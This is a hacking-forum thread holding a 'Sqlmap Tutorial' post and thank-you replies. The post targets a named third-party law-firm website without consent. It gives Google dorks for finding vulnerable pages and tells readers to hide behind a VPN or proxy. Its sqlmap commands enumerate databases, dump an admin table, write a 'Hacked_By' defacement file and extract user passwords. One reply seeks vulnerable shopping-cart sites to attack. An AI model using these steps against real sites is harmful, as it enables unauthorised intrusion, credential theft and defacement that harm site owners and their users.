|
VERIFIED
Join Date: Jun 2014
Posts: 168
 |
Sqlmap Tutorial
Hello All Members!
 Injection Tool: sqlmap Official Page: http://sqlmap.org Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master Testing: WIndows XP/SP3 , Python 2.7.5 vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10' !!!!! Use OpenVPN OR PROXY !!!!! Step1. Target Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc... Target: http://www.godwins-law.co.uk/staff.php?id=10 Target WebServer Operating System: WIndows 2003 Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8 Target BackEndDataBase: MySQL 5.0.0 Step2. DataBase sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs --database-- godwins information_schema Step3. Table sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables --table-- adminhelp articlecats articles contentimages imagelib news pages staff Step4. Column & Dump sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump Step5. Hacked Text sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt Step6. user & password sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords
__________________
|
|
|
  
Join Date: Apr 2016
Posts: 9
 |
nice tut
|
|
|
|
|
Join Date: Feb 2017
Posts: 4
|
nice tut thanks
|
|
|
|
|
Join Date: May 2017
Posts: 5
|
Thanks
|
|
|
|
|
Join Date: May 2017
Posts: 3
Contact: 718566205
|
all i need is vulnerable shopping cart site in my country now.
Thanks |
|
|
|
|
Join Date: May 2017
Posts: 9
|
thanks!!
|
|
|
|
 
Join Date: Aug 2013
Posts: 59
|
where is adminhelp table?
|
|
|
|
 |
| Tags |
| sqlmap, tutorial |
«
Previous Thread
|
Next Thread
»
|
|
